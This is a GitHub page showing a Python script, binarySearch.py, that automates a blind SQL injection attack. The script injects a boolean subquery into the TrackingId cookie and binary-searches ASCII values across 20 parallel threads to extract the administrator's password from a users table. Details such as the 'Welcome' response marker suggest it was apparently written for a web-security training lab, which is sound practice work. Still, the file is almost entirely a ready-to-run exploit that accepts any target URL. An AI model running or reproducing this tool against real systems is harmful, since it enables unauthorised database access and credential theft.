-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathbinarySearch.py
More file actions
226 lines (198 loc) Β· 7.62 KB
/
binarySearch.py
File metadata and controls
226 lines (198 loc) Β· 7.62 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
import requests
import threading
import sys
import readline
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
# βββ Constants ββββββββββββββββββββββββββββββββββββββββββββ
MAX_WORKERS = 20 # Parallel threads
MAX_RETRIES = 3 # Retry failed requests
TIMEOUT = 10 # Request timeout seconds
PASSWORD_LEN = 20 # Password length
ASCII_LOW = 32 # Printable ASCII start
ASCII_HIGH = 126 # Printable ASCII end
# βββ Shared State βββββββββββββββββββββββββββββββββββββββββ
password = ['?'] * PASSWORD_LEN
lock = threading.Lock()
found_count = 0
def get_input(prompt):
"""Get input with full keyboard support using readline"""
try:
return input(prompt)
except EOFError:
return ''
def fix_url(url):
"""Auto fix URL - add https:// if missing and trailing slash"""
url = url.strip()
if not url.startswith("http://") and not url.startswith("https://"):
url = "https://" + url
if not url.endswith('/'):
url += '/'
return url
def validate_url(url):
"""Validate URL format"""
if not url:
return False, "URL cannot be empty!"
if ' ' in url:
return False, "URL cannot contain spaces!"
if '.' not in url:
return False, "Invalid URL format! (e.g. abc123.example.net)"
return True, ""
def validate_cookie(value, name):
"""Validate cookie is not empty"""
if not value:
return False, f"{name} cannot be empty!"
if ' ' in value:
return False, f"{name} cannot contain spaces!"
return True, ""
def get_valid_input(prompt, validate_func, *args):
"""Keep asking until valid input is given"""
while True:
value = get_input(prompt).strip()
is_valid, error = validate_func(value, *args)
if is_valid:
return value
print(f" [!] {error} Please try again.")
def test_connection(url):
"""Test if URL is reachable"""
try:
r = requests.get(url, timeout=TIMEOUT)
return True, r.status_code
except requests.exceptions.ConnectionError:
return False, "Cannot connect - check URL"
except requests.exceptions.Timeout:
return False, "Connection timed out"
except requests.exceptions.InvalidURL:
return False, "Invalid URL format"
except Exception as e:
return False, str(e)
def send_request(session_obj, url, base_tracking_id, session_cookie, pos, operator, value):
"""Send single request with retry logic"""
tracking_id = (
f"{base_tracking_id}'+AND+"
f"(SELECT+ASCII(SUBSTRING(password,{pos},1))+FROM+users+"
f"WHERE+username='administrator'){operator}{value}--"
)
cookies = {
"TrackingId": tracking_id,
"session": session_cookie
}
for attempt in range(MAX_RETRIES):
try:
r = session_obj.get(url, cookies=cookies, timeout=TIMEOUT)
return "Welcome" in r.text
except requests.exceptions.Timeout:
if attempt < MAX_RETRIES - 1:
time.sleep(0.5 * (attempt + 1)) # Wait longer each retry
continue
return False
except Exception:
if attempt < MAX_RETRIES - 1:
time.sleep(0.3)
continue
return False
return False
def binary_search_char(session_obj, url, base_tracking_id, session_cookie, pos):
"""Find character at given position using binary search"""
global found_count
low, high = ASCII_LOW, ASCII_HIGH
while low <= high:
mid = (low + high) // 2
if send_request(session_obj, url, base_tracking_id, session_cookie, pos, ">", mid):
low = mid + 1
elif send_request(session_obj, url, base_tracking_id, session_cookie, pos, "<", mid):
high = mid - 1
else:
# Exact match found
char = chr(mid)
with lock:
password[pos-1] = char
found_count += 1
progress = f"{found_count}/{PASSWORD_LEN}"
print(f"[+] Position {pos:02d}: '{char}' | Progress: {progress} | {''.join(password)}")
return pos, char
# Not found
with lock:
print(f"[-] Position {pos:02d}: not found")
return pos, None
def check_session_valid(session_obj, url, base_tracking_id, session_cookie):
"""Quick check if cookies are still valid"""
try:
r = session_obj.get(url, cookies={
"TrackingId": base_tracking_id,
"session": session_cookie
}, timeout=TIMEOUT)
# If we get redirected to login, session expired
if "login" in r.url.lower():
return False
return True
except:
return False
def main():
global found_count, password
print("=" * 55)
print(" Blind SQLi - Binary Search Attack")
print("=" * 55)
print()
try:
# ββ Get and validate URL ββ
while True:
url = get_valid_input("[*] URL : ", validate_url)
url = fix_url(url)
print("[*] Testing connection...")
ok, result = test_connection(url)
if ok:
print(f"[+] Connected! Status: {result}\n")
break
else:
print(f" [!] {result}")
print(" [!] Please enter a valid URL.\n")
# ββ Get cookies ββ
tracking_id = get_valid_input("[*] TrackingId : ", validate_cookie, "TrackingId")
session = get_valid_input("[*] Session : ", validate_cookie, "Session")
# ββ Validate session before starting ββ
print("\n[*] Validating cookies...")
http_session = requests.Session() # Reuse TCP connections = faster
if not check_session_valid(http_session, url, tracking_id, session):
print("[!] Warning: Session may be expired - results could be wrong!")
else:
print("[+] Cookies OK!\n")
print(f"[*] Target : {url}")
print(f"[*] Threads : {MAX_WORKERS}")
print(f"[*] Retries : {MAX_RETRIES} per request")
print(f"[*] Starting attack...\n")
# Reset state
password = ['?'] * PASSWORD_LEN
found_count = 0
start_time = time.time()
# ββ ThreadPoolExecutor - more efficient than manual threads ββ
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
futures = {
executor.submit(
binary_search_char,
http_session, url, tracking_id, session, pos
): pos
for pos in range(1, PASSWORD_LEN + 1)
}
# Process results as they complete
for future in as_completed(futures):
try:
future.result()
except Exception as e:
pos = futures[future]
print(f"[-] Position {pos:02d} error: {e}")
elapsed = time.time() - start_time
# ββ Final result ββ
print("\n" + "=" * 55)
if '?' in password:
print("[!] Warning: Some positions failed!")
print("[!] Try again with fresh cookies.")
print(f"[*] Final Password : {''.join(password)}")
print(f"[*] Time Taken : {elapsed:.2f} seconds")
print("=" * 55)
except KeyboardInterrupt:
print("\n\n[-] Interrupted by user.")
print(f"[*] Partial Password: {''.join(password)}")
sys.exit(0)
if __name__ == "__main__":
main()